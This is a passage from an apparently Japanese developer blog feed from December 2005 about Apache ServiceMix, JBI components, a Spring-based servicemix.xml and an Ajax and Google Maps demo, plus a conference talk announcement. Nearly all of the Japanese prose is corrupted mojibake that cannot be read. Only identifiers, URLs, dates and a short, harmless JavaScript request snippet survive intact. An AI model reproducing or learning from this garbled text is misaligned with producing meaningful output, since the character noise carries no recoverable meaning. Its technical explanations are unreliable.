    ¡¡ֶגֲ¦₪־ֽ׳ֱַsm:container[2]₪¬JBI¥³¥ף¥ֶ¥₪ֻ₪₪ך₪₪¹¡£JBI₪ֿJMX₪ַ₪־´ֹֽ‎₪ע¹װ₪¦₪³₪ָ₪¬₪ַ₪­₪כ₪־₪ַ¡¢₪½₪־ְִך₪ע¹װ₪₪₪₪¹¡£÷£²ף₪־¥ַ¥ג₪ֿ1ֲז₪־ֳ¼ֻצ₪ֻ2₪ִ₪־ServiceMix₪ע־©₪ֱ¾ו₪²₪כֵװ¹ח¾ו¡¢¥¡¼¥ָָײ¹ז₪¬₪ײ₪ִ₪«₪ֳ₪ֶ₪·₪₪¦₪¿₪ב₪ֲֻ°ְ­useMBeanServer₪עfalse₪ֻ₪·₪ֶ₪₪₪₪¹¡ֵֻצ₪ֿ¥¡¼¥ָָײ¹ז₪ע₪«₪¨₪ֶ₪¢₪²₪כ₪₪­₪ַ₪¹₪¬¡ֻ¡£
    -¡¡ServiceMix₪ֿ¡¢₪³₪־JBI¥³¥ף¥ֶ¥₪ְ₪±₪עSpring¾ו₪ֻ¥ַ¥׳¥ם¥₪₪·₪ֶ₪₪₪כ₪ְ₪±₪ַ₪¹¡£₪ַ₪¹₪«₪יSpringֶגס₪·₪ֶ₪₪₪כ₪ן₪±₪ַ₪ֿ₪₪¯¡¢BC₪הSE₪עJBI¥³¥ף¥ֶ¥₪ֻ¥ַ¥׳¥ם¥₪₪¹₪כ₪¿₪ב₪ְ₪±₪ֻDI¥³¥ף¥ֶ¥₪ע₪¦₪₪¯₪ִ₪«₪ֳ₪ֶ₪₪₪₪¹¡£₪½₪־₪¿₪ב¡¢ֲ¾₪־DI¥³¥ף¥ֶ¥₪״₪־°¹װ₪גֳ±½ד₪ֻ¹װ₪¨₪כּץ₪ַ₪¹¡£

    - -

    ¡¡ֽ׳ֱַsm:activationSpec[3]₪¬JBI₪־¥³¥ף¥¡¼¥ֽ¥ף¥ָ¡¢₪ִ₪₪ךBC₪הSE₪ע"¥¢¥¯¥ֶ¥£¥¡¼¥ָ"₪¹₪כ₪¿₪ב₪ֻ»ָ₪ן₪ל₪ֶ₪₪₪₪¹¡£₪³₪³₪־ְגְּ₪¬₪ה₪ה₪³₪·₪₪₪־₪ַ₪¹₪¬¡¢JBI₪־¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ֿ¥ם¥¸¥ֳ¥¯₪ע½ס₪¯₪ְ₪±₪ַ₪ֿ₪₪¯¡¢JBI¾ו₪ַµ¡ַ½₪¹₪כ₪¿₪ב₪ֻֽֽ¡¹₪¾נף₪עֵ׀ֿ¿₪¹₪כֹ¬ֽ׳ְ­₪¬₪¢₪ך₪₪¹¡£¶סֲ־ֵ×₪ֻ₪ֿ¥µ¡¼¥׃¥¹ּ¾₪ה¥¨¥ף¥ֹ¥¥₪¥ף¥ָּ¾₪עNMR₪ֵֻ׀ֿ¿₪¹₪כ₪־₪ַ₪¹₪¬¡¢₪³₪ל₪ע¥¢¥¯¥ֶ¥£¥¡¼¥ָ₪ָ¸ֶ₪׃₪₪¹¡₪³₪³₪י₪״₪ף₪ֿWSDL2₪־ֳֿ₪₪־₪ַ¡¢₪₪ף₪ָ₪₪¯ּ¾ֱ°₪עֵ׀ֿ¿₪¹₪כ₪ף₪ְִרֵ₪־ֽ‎²ע₪ַ־ֹ₪₪₪ַ₪¹¡ֻ¡£
    -¡¡ServiceMix₪ַ₪ֿJBI₪״₪־¥ַ¥׳¥ם¥₪₪עֳ±½ד₪ֻ₪¹₪כ₪¿₪ב₪ֻ¥¢¥¯¥ֶ¥£¥¡¼¥ָ½טֽ‎₪ע¹װ₪ֳ₪ֶ₪¯₪ל₪כ¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ע¥¢¥ְ¥׳¥¿₪ָ₪·₪ֶֽׁ°ױ₪·¡¢₪½₪־¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ֻ¥׃¥¸¥ֽ¥¹¥ם¥¸¥ֳ¥¯₪ע¥₪¥ף¥¸¥§¥¯¥ָ₪¹₪כ₪ט₪¦₪ְֻ·׳₪µ₪ל₪ֶ₪₪₪₪¹¡£₪³₪¦₪¹₪כ₪³₪ָ₪ַ¥¢¥¯¥ֶ¥£¥¡¼¥ָ½טֽ‎₪ָ¥׃¥¸¥ֽ¥¹¥ם¥¸¥ֳ¥¯₪ע´°ֱ´₪ְֻ₪ך־¥₪·₪ֶ₪₪₪כ₪־₪ַ₪¹¡£₪³₪³₪י₪״₪ף₪גDI₪ע₪¦₪₪¯ֽרֽׁ₪·₪ֶ₪₪₪כ₪₪¡₪ָ´¶₪¸₪₪¹¡£
    -¡¡ֲ°ְ­id¡₪ג₪·₪¯₪ֿcomponentName¡ֻ₪¬¡¢¼ֲ¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ע¸ֶ₪׃½׀₪¹ּ¾ֱ°₪ַ₪¹¡£¼¡₪־ֲ°ְ­service₪¬JBI¾ו₪ַ₪־¥µ¡¼¥׃¥¹ּ¾₪ֻ₪₪ך₪₪¹¡£JBI₪ַ₪ּֿ¾ֱ°¶ץ´ײ₪עֹױ₪±₪כ₪³₪ָ₪ַ¥µ¡¼¥׃¥¹ּ¾₪עִךµֱ₪·₪₪¹¡£Java₪־¥ׁ¥ֳ¥±¡¼¥¸ּ¾₪ֶָ±₪¸₪ַ₪¹₪¬¡¢₪³₪¦₪¹₪כ₪³₪ָ₪ַ£¿פ₪־¥µ¡¼¥׃¥¹₪עּ¾ֱ°₪ע₪«₪ײ₪כ₪³₪ָ₪₪¯ֽרֽׁ₪ַ₪­₪כ₪ט₪¦₪ֻ₪₪כ₪ן₪±₪ַ₪¹¡£₪₪×¥¨¥ף¥ֹ¥¥₪¥ף¥ָּ¾₪ֿ»״ִך₪·₪₪±₪ל₪׀¥µ¡¼¥׃¥¹ּ¾₪ֶָ±₪¸₪ֻ₪₪ך₪₪¹¡£÷ַ¸ו₪־ֽ׳ֱַdestinationService₪¬¡¢¼¡₪ֻ¥כ¡¼¥ֶ¥£¥ף¥°₪¹₪כ¥µ¡¼¥׃¥¹₪ע¼¨₪·₪₪¹¡£
    -¡¡
    -¡¡₪½₪־ֶגֲ¦₪־ֽ׳ֱַsm:component[4]₪¬¡¢₪³₪ל₪₪¿¥¢¥ְ¥׳¥¿₪ֻ₪₪ֳ₪ֶ₪₪₪₪¹¡£JBI₪ַ₪ֿ¥ב¥ֳ¥»¡¼¥¸¸ע´¹₪¹₪כ₪¿₪ב₪ֻֽֽ¡¹₪¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪עֽרֽׁ₪·₪₪¹¡£₪½₪ל₪י₪עֱ´ֹפ°·₪¦₪־₪ֲֿחׁ₪₪־₪ַ¥¡¼¥¹¥¯¥י¥¹₪עִף¶¡₪·¡¢₪³₪ל₪ע·ׁ¾µ₪¹₪כ·ֱ₪ַ¥ם¥¸¥ֳ¥¯₪עµ­½ׂ₪·₪₪¹¡£₪½₪־¥¡¼¥¹¥¯¥י¥¹₪ֻ¡¢₪₪₪ם₪₪₪ם₪₪ג₪־₪ע¥₪¥ף¥¸¥§¥¯¥ָ₪¹₪כֹ¬ֽ׳ְ­₪¬₪¢₪כ₪־₪ַ¡¢₪½₪ל₪ע¹װ₪¦₪¿₪ב₪־¥¢¥ְ¥׳¥¿₪ֻ₪₪ך₪₪¹¡£

    - -

    ¡¡₪½₪·₪ֶֽ׳ֱַbean[5]₪¬¡¢₪ט₪¦₪ה₪¯ֹבִּ₪־Spring₪־ְִך₪ֻ₪₪ך₪₪¹¡£ֲ°ְ­xmlns₪ע»״ִך₪¹₪כ₪³₪ָ₪ַ¡¢₪½₪־ֶגֲ¦₪ֻ₪ִ₪₪₪ֶ₪ּֿ¾ֱ°¶ץ´ײ₪־»״ִך₪¬ֹװֽ׳₪ֻ₪₪ך₪₪¹¡£

    - -


    -₪ַ₪ֿ¡¢₪³₪³₪«₪י₪ֿ¼ֲ÷₪־³ֶ¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ע¸«₪ֶ₪₪₪­₪₪·₪ח₪¦¡¢¡¢₪ָ»׳₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢ִ¹₪¯₪₪ֳ₪¿₪־₪ַ₪₪¿¼¡²ף₪ָ₪₪₪¦₪³₪ָ₪ַ¡w¡£

    - -

    ServiceMix₪־°לֽק

    ]]>
    -servicemix -yusuke -2005-12-11T22:50:24+09:00 -
    - -ServiceMix (2) ¥ַ¥ג¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף³µֽ׳ -http://www.arclamp.jp/blog/archives/000739.html -¡¡₪µ₪ֶ¡¢÷£²ף₪ֿ¥ַ¥ג₪־³µֽ׳₪ַ₪¹¡¥ַ¥ג₪־¥ְ¥¦¥ף¥ם¡¼¥ֹ₪ֿServiceMix (1) JBI₪ָServiceMix ₪«₪י¡ֻ¡£

    - -

    ¥׃¥¸¥ֽ¥¹³µֽ׳
    -¡¡¥ְ¥¦¥ף¥ם¡¼¥ֹ₪ַ₪­₪כ¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪ַ₪ֿµ‏ֵװ₪עֲך÷א₪ֻ₪·₪ֶ₪¢₪ך₪₪¹¡£µ‏ֵװ₪עֻ¬₪ל₪¿₪₪¿ֽ₪¬¡¢¿ֽ¿פ₪ָ¥°¥כ¡¼¥׳¡²ֲָ²¡¿ֽ§ֳ£¡¿ֳֻ₪־₪¡¿½ק₪־₪¡ֻ₪עֶ‏־ֿ₪¹₪כ₪ָ¡¢ֳֿ¿¾ו₪ֻ₪½₪־¾ע·ן₪ֻ₪¢₪ֳ₪¿¾נף₪עֹ½¼¨₪·₪·₪₪¹¡£₪¢₪ָ₪ֿ¡¢¾נף₪־¾÷₪ע₪₪¿₪ך¡¢₪½₪ל₪י₪עַ₪°ױ₪ֱֻ×₪׃·׀ֿ©₪עֹ½¼¨₪µ₪»₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹¡£ֹ½¼¨₪µ₪ל₪כ¾נף₪ֿ»±¡₪־¾נף¡¢¥₪¥¥ף¥ָ₪־¾נף¡¢₪½₪·₪ֶֹ´²ֵ¹₪־¾נף₪ַ₪¹¡£

    - -

    - -

    ¡¡Windows₪ַJDK1.4.2°¹₪¬ֶ‏₪ֳ₪ֶ₪₪₪כ₪₪י¡¢¥ְ¥¦¥ף¥ם¡¼¥ֹ₪·₪ֶ²עֵא₪¹₪כ₪ְ₪±₪ַ₪¹₪°₪ֻ»מ₪»₪כ₪ט₪¦₪ֻ₪₪ֳ₪ֶ₪₪₪₪¹¡Mac₪ֿmaven·׀ֽ³₪ַ₪₪₪±₪₪·₪¿¡£Linux₪ֿ¸»ת²½₪±₪·₪¿₪י₪´₪ב₪ף₪₪µ₪₪¡ֻ¡£₪×»מ₪·₪¯₪ְ₪µ₪₪¡£

    - -


    -Webֱ״₪־³µֽ׳
    -¡¡Webֱ״₪ֿ₪₪₪ן₪ז₪כAjax¡Asynchronous JavaScript + XML¡ֻ₪ַ₪¹¡£ֳֿ¿₪ֿGoogle Maps₪«₪יֶֹ₪¹‏₪¡¢µ‏ֵװ₪־¾נף₪ֿServiceMix₪«₪יXML·ֱ¼°₪ַ¼טְֶ₪·₪ֶ₪₪₪₪¹¡£₪ן₪«₪ך₪ה₪¹₪₪Web2.0ֵ×Mush-up¥µ¥₪¥ָ₪ַ₪·₪ח₪¦¡£
    -¡¡Ajax₪־÷מ₪ך₪ע´ֳ±₪ֻ¡£¥ְ¥¦¥ף¥ם¡¼¥ֹ₪·₪¿¥ױ¥©¥כ¥ְ₪־src\webapp₪ֻ₪¢₪כmymap.js¡UTF-8¡ֻ₪ע¸«₪ֶ₪¯₪ְ₪µ₪₪¡£÷ַ²¼ֹפ₪־¥ב¥½¥ֳ¥ֹcreateMyMap₪ֿ´נֵֻ×₪Google Maps₪־¼ֱֲץ₪ע₪·₪ֶ₪₪₪₪¹¡£₪ִ₪₪ך¥µ¡¼¥׀₪¬ServiceMix₪ַ₪¢₪כ₪³₪ָ₪ֿ°ױ¼±₪·₪ֶ₪₪₪₪»₪ף¡£₪ֱ₪ח₪ֳ₪ֳֶָּ₪₪־₪ֿ¥ך¥¯¥¨¥¹¥ָ₪ַXML₪עPOST₪·₪ֶ₪₪₪כְֵ₪ְ₪±₪ַ₪¹¡£

    - -
    -  var request = GXmlHttp.create();
    -  request.open('POST', '/exec/jbi/', true);
    -  request.onreadystatechange = function() {
    -    if (request.readyState == 4) {
    -      //¼ץ¿®¸ו₪־½טֽ‎¡¥¡¼¥«¡¼₪ע₪×₪₪₪ֶ¡¢¥ך¥¹¥ָ₪ִֹֻ²ֳ¡ֻ
    -    }
    -  }
    -  request.setRequestHeader("content-type", 
    -      "application/x-www-form-urlencoded;charset=UTF-8");
    -  request.send(DemoUtil.serializeRequestInfos(document.
    -      getElementById('entryform')));
    -
    - -


    -¥µ¡¼¥׀¥ם¥¸¥ֳ¥¯₪־³µֽ׳
    -¡¡¥µ¡¼¥׀₪ֻ₪ֿ£¿פ₪־InfoProvider₪ָ₪₪₪¦¥µ¡¼¥׃¥¹₪¬¥ַ¥׳¥ם¥₪₪·₪₪¹¡£InfoProvider₪ֿ¥ז¡¼¥¶¡¼₪¬ֶ‏־ֿ₪·₪¿¾ע·ן₪ע¥­¡¼₪ֻ₪·₪ֶ¾נף₪עײµׁ₪·₪₪¹¡£÷£²ף₪ֿ»±¡₪־¾נף¡¢¥₪¥¥ף¥ָ₪־¾נף¡¢ֹ´²ֵ¹₪־¾נף₪עִף¶¡₪¹₪כ3₪ִ₪־InfoProvider₪¬ֲ¸÷₪·₪₪¹¡£ServiceMix₪ֿ¥ַ¥׳¥ם¥₪₪µ₪ל₪¿3₪ִ₪־InfoProvider₪ע¸ֶ₪׃½׀₪·¡¢₪½₪ל₪י₪־¾נף₪ע½¸ְׁ₪·₪ֶ₪₪₪₪¹¡£

    - -


    -ServiceMixֶג₪־³µֽ׳

    -¡¡ServiceMix₪ַ¼ֲ¹װ₪¹₪₪­₪³₪ָ₪ֿ¡¢°²¼₪־2₪ִ₪ַ₪¹¡£
    -1.¥¯¥י¥₪¥¢¥ף¥ָ₪«₪י₪־¥ך¥¯¥¨¥¹¥ָ₪עJBI₪ֻ־®₪·¹‏₪
    -2.InfoProvider₪ע¸ֶ₪׃½׀₪·¡¢₪½₪־·כ²ּ₪ע₪₪ָ₪ב₪ֶ¥ל¥¹¥¥ף¥¹

    - -

    ¡¡₪₪÷₪ֿ¼¡₪־¿₪ע¸«₪ֶ₪¯₪ְ₪µ₪₪¡¥¯¥ך¥ֳ¥¯₪ַ³ֲָח¿₪עֹ½¼¨¡ֻ¡£

    - -

    - -

    ¡¡÷¸ֲ¦₪¬¥ײ¥י¥¦¥¶₪ֻ₪₪ך₪₪¹¡£¥×¥ל¥ף¥¸₪־´₪¬Servlet₪ֻ₪₪ֳ₪ֶ₪×₪ך¡¢HTTP¥ך¥¯¥¨¥¹¥ָ₪־¥¹¥ָ¥ך¡¼¥א₪ע₪½₪־₪₪httpBinding¡Hb¡ֻ₪ֻ־®₪·¹‏₪₪₪¹¡£

    - -

    ¡¡httpBinding¡Hb¡ֻ₪ֿBindingComponent₪־ּע³ה₪ע²ּ₪¿₪·₪ֶ₪×₪ךMeesageExchange₪ֻׁ´¹¸ו¡¢asyncForwarder¡As¡ֻ₪ֵֻֿ₪·₪₪¹¡£

    - -

    ¡¡asyncForwarder¡As¡ֻ₪ֿ¡¢ֶ±´¡InOut¡ֻ₪«₪יָףֶ±´¡InOnly¡ֻ₪״₪־ׁ´¹₪ע¹װ₪₪₪₪¹¡£₪´ֲ¸ֳ־₪־ִּ₪ךHTTP₪ֶֿ±´¥ב¥ֳ¥»¡¼¥¸₪ַ₪¹₪¬¡¢InfoProvider₪עָףֶ±´¼ֲ¹װ₪µ₪»₪כ₪¿₪ב₪ֻׁ´¹₪ע₪¹₪כֹ¬ֽ׳ְ­₪¬₪¢₪ך₪₪¹¡£ֶגֹפֵ×₪ֻ₪ֿ¡¢¼ץ₪±¼ט₪ֳ₪¿ֶ±´¥ב¥ֳ¥»¡¼¥¸₪ע¼ט₪ֳ₪ֶ₪×₪­₪ִ₪ִ¡¢₪½₪־ֶגֶֽ₪ע¥³¥װ¡¼₪·₪ֶ¡¢findAggregator¡Ag¡ֻ₪ֻ¿·₪·₪₪ָףֶ±´¥ב¥ֳ¥»¡¼¥¸₪ע₪·₪ֶ₪₪₪₪¹¡£

    - -

    ¡¡findAggregator¡Ag¡ֻ₪ֿ¡¢»״ִך₪µ₪ל₪¿£¿פ₪־Service Engine₪ֻ¥ב¥ֳ¥»¡¼¥¸₪עָףֶ±´₪ֱַק¿®₪·¡¢₪½₪ל₪י₪־·כ²ּ¡XML¡ֻ₪עֱ´₪ֶ½¸₪ב₪ֶײµׁ₪·₪₪¹¡£

    - -

    ¡¡÷£²ף₪־ְִך₪ַ₪ֿP1¡¢P2₪¬InfoProvider₪ֻ₪₪ך₪₪¹¡£₪½₪·₪ֶexP÷ַ¸ו₪־1₪ִ₪ְ₪±₪ֻ»ֵ³₪±₪¬₪·₪ֶ₪¢₪ך₪₪¹¡£exP₪ֿ¡¢₪½₪־₪₪exServiceOutBound¡OB)₪ֻ½טֽ‎₪ע־®₪·₪ֶ₪₪₪₪¹¡£

    - -

    ¡¡exServiceOutBound¡OB¡ֻ₪ֿ¡¢HTTP₪ַ¥¢¥¦¥ָ¥׀¥¦¥ף¥ֹ₪ע¹װ₪¦BindingComponent₪ַ₪¹¡£¥¢¥¦¥ָ¥׀¥ף¥ְֹט₪ּֿ¥µ¡¼¥׀¥₪¥ף¥¹¥¿¥ף¥¹₪־ServiceMix₪ֻ₪₪ך₪₪¹¡£

    - -

    ¡¡ּ¥µ¡¼¥׀¥₪¥ף¥¹¥¿¥ף¥¹₪־ServiceMix₪־ֳז₪ֿ¡¢₪³₪ל₪₪ַ₪־ְגְּ₪ֹ₪×₪ך₪־»ֱֵָ₪₪ֻ₪₪ֳ₪ֶ₪₪₪₪¹¡£₪½₪·₪ֶ3₪ִּ₪־InfoProvider¡Pex¡ֻ₪¬¥ַ¥׳¥ם¥₪₪µ₪ל₪ֶ₪₪₪₪¹¡£

    - -


    -¡¡₪ִ₪₪ךInfoProvider₪ֱֿ´ֹפ₪ַ3₪ִ₪ַ₪ֿ₪¢₪ך₪₪¹₪¬¡¢2₪ִ₪¬ֶ±¥₪¥ף¥¹¥¿¥ף¥¹ֶג₪ֻ¸µ¡¹¥ַ¥׳¥ם¥₪₪µ₪ל₪ֶ₪₪₪כ₪ג₪־₪ַ₪¹₪¬¡¢÷ַ¸ו₪־1₪ִ₪ְ₪±₪ּֿ¥µ¡¼¥׀¥₪¥ף¥¹¥¿¥ף¥¹ֶג₪ֻ₪¢₪ך¡¢₪½₪³₪ָ₪ֿHTTP¡REST¡ֻ₪עִּ₪¸₪ֶ½טֽ‎₪ע°ֽֽך₪·₪ֶ₪₪₪כ₪־₪ַ₪¹¡£3₪ִ₪־InfoProvider₪עֶ°₪«₪¹₪¿₪ב₪ַ₪ֿ₪¢₪ך₪₪¹₪¬¡¢ֹ¬ֽ׳₪½טֽ‎₪ֻ¬²ע₪·₪ֶ₪₪₪¯₪ָ¡¢₪³₪־₪ט₪¦₪·ֱ₪ַ¼ֲ¸½₪¹₪כ₪³₪ָ₪ֻ₪₪ך₪₪¹¡£

    - -

    ¡¡₪ב₪ף₪ֹ₪¦₪ְ₪₪¡₪ָ´¶₪¸₪כ₪«₪ג₪·₪ל₪₪»₪ף₪¬¡¢¼ֲ₪ֿInfoProvider°³°₪ֱֿ´₪ֵֶֶָֽׁ×₪¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ַ₪¹¡£¸ו₪ַInfoProvider₪־ְגְּ₪ע₪·₪₪¹₪¬ֳז¿ָ₪ֿPOJO₪ַ₪¹¡£POJO₪ע÷מְ®₪¹₪כ₪ְ₪±₪ַ¡¢₪¢₪ָ₪ֿ½טֽ‎¼ך½ח₪עֱָ₪¹ח₪ן₪»₪כ₪ְ₪±₪ַ¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪¬₪ַ₪­₪ֶ₪₪₪כ₪ָ¹ֽ₪¨₪כ₪ַָּּע₪¯₪¢₪ך₪₪»₪ף₪«¡©

    - -


    -¡¡₪³₪ל₪עServiceMix¾ו₪ְִַך₪¹₪כ₪¿₪ב₪־servicemix.xml₪עְגְּ₪·₪ט₪¦₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪־₪ַ₪¹₪¬¡¢ִ¹₪¯₪₪ֳ₪¿₪־₪ְַ₪ך₪₪¹¡£¼¡²ף₪ֿservicemix.xml₪ַ₪¹¡£

    - -

    ServiceMix₪־°לֽק

    ]]>
    -servicemix -yusuke -2005-12-10T21:00:42+09:00 -
    - -¥ַ¥ײ¥µ¥2006ֵ׀ֳֵ₪·₪₪¹¡ץ¼ץֹױ³«»ֿ -http://www.arclamp.jp/blog/archives/000738.html -¥ַ¥ײ¥µ¥2006¡2006ַ¯2·מ9ֶ¡¢10ֶ¡ֻ₪ֵֻ׀ֳֵ₪₪₪¿₪·₪₪¹¡£

    - -
    2006/2/10¡¡15:25¡ֱ16:15 - -

    ¡10-D-5¡Web2.0ֵ×SOA Ajax+DI+JBI₪ַ¼ֲ¸½₪¹₪כֱֲ·כ¹ח¥¢¡¼¥­¥ֶ¥¯¥ֱ¥ד

    - -

    ְ₪´ײ₪ֱַ₪¬₪ל₪ֶ₪ֿ₪₪₪כ₪ג₪־₪־ְְֵ₪־¾¯₪₪½₪¦₪Web2.0₪ָSOA¡£¥»¥ֳ¥·¥ח¥ף₪ַ₪ֿ־¾¼װ₪עָז³׃₪·₪₪¬₪יWeb2.0ֵ×SOA₪ע¹ֽ₪¨₪ֶ₪­₪₪¹¡£₪½₪·₪ֶ¥ַ¥ג₪עִּ₪¸₪ֶAjax¡¢DI¡¢JBI₪עֱָ₪¹ח₪ן₪»₪¿ֱֲ·כ¹ח¥¢¡¼¥­¥ֶ¥¯¥ֱ¥ד₪עֳ־₪ל₪׀¡¢¥ן¥¯¥ן¥¯₪¹₪כ₪ט₪¦₪²ִַ½ְ­₪ע´¶₪¸₪י₪ל₪כ₪ֿ₪÷₪ַ₪¹¡£

    - -


    -¡¡¥ַ¥ײ¥µ¥2006₪־¥ֶ¡¼¥₪ֿ¡ײDeveloper 2.0¡׳₪ְ₪½₪¦₪ַ₪¹¡£

    - -
    Developers 2.0₪ֿ¡¢₪ט₪ך¹ג₪₪»ײ₪ע»‎₪ֱ¡¢₪ט₪ך¹­₪₪»כּמ₪ַ»ֵ»צ₪עֲ×₪¨¡¢₪ט₪ך¿¼₪₪ֶ¶»¡₪ַּ₪ֽט₪ע¸«¿ר₪¨₪כ₪³₪ָ₪־₪ַ₪­₪כ¿ֽ₪¿₪ֱ₪ַ₪¢₪כ₪ִָךµֱ₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹¡£
    - -

    ¡¡₪ָ₪₪₪¦₪³₪ָ₪₪־₪ַ¡¢ּ₪ֽט₪עֽ½ֲ¬₪ַ₪­₪כֶגֶֽ₪ֻ₪·₪¿₪₪₪ָ¹ֽ₪¨₪ֶ₪₪₪₪¹¡£₪³₪־¥ײ¥ם¥°₪ַ²¿²ף₪ג½ס₪₪₪ֶ₪₪₪₪¹₪¬¡¢SOA₪עֳ±₪ֻBuzz¥ן¡¼¥ֹ₪ָ₪·₪ֶ₪ָ₪י₪¨₪כ₪־₪ַ₪ֿ₪₪¯¡¢₪½₪³₪ַ»ָ₪ן₪ל₪ֶ₪₪₪כµ»½ׁ₪־ֻ¼ֱ¡₪×₪₪₪·₪₪₪ָ₪³₪ם¡ֻ₪ְ₪±₪ע¼ט₪ך½׀₪¹₪³₪ָ₪ַ¡¢¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪־÷מ₪ך‎₪¬₪₪ֳ₪¿₪¯ׁ₪ן₪כ₪ָ»׳₪ֳ₪ֶ₪₪₪₪¹¡£₪½₪ל₪ע₪₪₪ֱֱב₪¯¼ֲ¸½₪·₪ֶ₪₪₪כ₪־₪¬Web2.0₪־־®₪ל₪ַ₪·₪ח₪¦¡£Java₪־ְ₪³¦₪־Web2.0¡¢₪ִ₪₪ךWeb2.0ֵ×SOA₪ָ₪₪₪¦₪־₪¬¼¡ְ₪ֲו₪־¥¢¥׳¥±¡¼¥·¥ח¥ף³«ָ¯¼ךֻ¡₪ַ₪ֿ₪₪₪₪«¡¢₪ָ₪₪₪¦ִף¾§₪¬¹ײ±י₪־¹»ׂ₪ֻ₪₪ך₪₪¹¡£

    - -

    ¡¡ֶגֶֽ₪ָ₪·₪ֶ₪ֿServiceMix¼‏₪ך₪ֻ₪₪ך₪₪¹¡£JavaOne¡¢´»³ְטְ¸¥ל¥¯¥ֱ¥ד¡¼¥·¥ך¡¼¥÷₪ָ´נֵֻ×₪ֻ₪ֶֿ±₪¸₪ַ₪ֿ₪¢₪ך₪₪¹₪¬¡¢₪³₪־£²²ף₪ע·׀₪ֶ¡¢ֱֵ₪¨₪¿₪₪¥¥₪¥ף¥ָ₪גְּ³־₪ֻ₪₪ֳ₪ֶ₪­₪₪·₪¿₪·¡¢÷£₪₪ַ₪־£²²ף₪ע¹₪₪₪¿‎₪ֻ₪ג°ד₪¦»כְֵ₪עִף¶¡₪ַ₪­₪כ₪ט₪¦₪ֻ₪¬₪ף₪׀₪ך₪¿₪₪₪ָ»׳₪₪₪₪¹¡₪¢₪ָ¡¢₪₪ף₪«¥µ¥׳¥י¥₪¥÷₪עֽׁ°ױ₪·₪¿₪₪₪ָ₪ֿ»׳₪ֳ₪ֶ₪₪₪₪¹¡ֻ¡£

    - -


    -¡¡זֶ±ֻ¼ׂ₪־₪´ֳ´ֵצ¼װ₪¬¡ײ¥ַ¥ײ¥µ¥₪ַֿ¯£±²ף₪־¥ַ¥¥ם¥ֳ¥ׁ¡¼₪־³§ֽֽ₪״₪־´װ¸µ₪ַ₪¹¡׳₪ָ₪₪₪ן₪ל₪ֶ₪₪₪₪·₪¿¡£₪ג₪ֱ₪ם₪ףּµ־ֱ₪ַ₪¹₪·¡¢₪½₪ל₪ְ₪±₪ֲֻ¿₪¯₪־Developers 2.0₪¿ֽ¡¹₪¬¶¨־ֿ₪ע₪·₪ֶ₪₪₪₪¹¡£
    -¡¡ֻֽ₪ָ₪·₪ֶ₪ֿ¡¢20ֲו¸וָ¾₪«₪י30÷׀ֲו₪ַ¡ײ³«ָ¯¼װ₪ָ₪·₪ֶ₪־¼«¬₪ַֻ÷₪₪ע»‎₪ֳ₪ֶ₪₪₪כ¸½¾ל₪־¿ֽ¡׳₪ֻֽט₪ֶ₪₪₪¿₪ְ₪­₪¿₪₪₪ַ₪¹¡£₪¿₪ײ₪ף¡¢₪½₪¦₪₪₪¦‎₪ֶֿ¡¹₪־¶ָּ³₪¬₪ָ₪ֳ₪ֶ₪גֻ»₪·₪¯₪ֶ¡¢₪½₪ל₪ֹ₪³₪ם₪¸₪ד₪₪₪₪ֳ₪ֶ»׳₪ן₪ל₪כ₪«₪ג₪·₪ל₪₪»₪ף¡£₪ַ₪ג¡¢₪½₪¦₪₪₪¦‎₪³₪½Developers 2.0₪ֻ¿¨₪ל₪ֶ₪₪₪¿₪ְ₪­₪¿₪₪₪ָ¿´₪«₪י»׳₪₪₪₪¹¡£₪³₪־£²ֶ´ײ₪ֿ¥׳¥ם¥¸¥§¥¯¥ָ₪¬»₪₪ֳ₪¿₪ֳ₪ֶ₪₪₪₪₪¸₪ד₪₪₪₪ַ₪¹₪«¡₪×₪₪¡×¡ֻ¡£₪³₪־£²ֶ´ײ₪ַ³״₪ף₪ְ₪³₪ָ₪¬ּ₪ֽט₪־¥׳¥ם¥¸¥§¥¯¥ָ₪־¡¢₪₪ֻ₪ט₪ך¼«¬₪־ּע₪ֻ־©₪ִ₪ֿ₪÷₪ַ₪¹¡£₪¼₪ׂ¡¢»²²ֳ₪ע₪´¸¡ֶ₪₪¯₪ְ₪µ₪₪¡£

    - -

    ¥ַ¥ײ¥µ¥2006¡¡»²²ֳֵ׀ֿ¿
    -

    ]]>
    -₪½₪־ֲ¾₪־ֲֳֿך -yusuke -2005-12-10T12:10:15+09:00 -
    - -ServiceMix (1) JBI₪ָServiceMix -http://www.arclamp.jp/blog/archives/000737.html -¡¡2005/12/9₪ֻ¹װ₪ן₪ל₪¿´»³ְטְ¸¥ל¥¯¥ֱ¥ד¡¼ֶג₪ַ¹װ₪ֳ₪¿¥ַ¥ג₪ע¥ְ¥¦¥ף¥ם¡¼¥ֹ₪ַ₪­₪כ₪ט₪¦₪ֻ₪·₪₪·₪¿¡£₪³₪־÷₪₪־₪ַ¡¢₪ֱ₪ד₪ף₪ָ₪₪ָ₪ב₪ֶ₪₪₪·₪¿¡£ֿ¢÷₪ַ²עְג₪ע¹װ₪₪₪¿₪₪₪ָ»׳₪₪₪₪¹¡£

    - -

    »ס־ֱ₪־¥ְ¥¦¥ף¥ם¡¼¥ֹ¡÷ַ²¼ֹפ₪־20051209_demo_1.pdf₪«20051209_demo_6.pdf¡ֻ

    - -

    ¥ַ¥ג¥¢¥׳¥ך₪־¥ְ¥¦¥ף¥ם¡¼¥ֹ¡meegle_20051210.zip 13.2MB¡ֻ

    - -

    1.ֵ¬ֵצ₪₪ָ₪³₪ם₪ַ²עֵא₪¹₪כ
    -2.servicemix.bat₪ע¼ֲ¹װ₪¹₪כ
    -3.servicemixEx.bat₪ע¼ֲ¹װ₪¹₪כ
    -4.http://localhost:8080/exec/₪ֻ¥¢¥¯¥»¥¹₪¹₪כ
    -5.₪₪ף₪ָ₪₪¯»מ₪¹

    - -
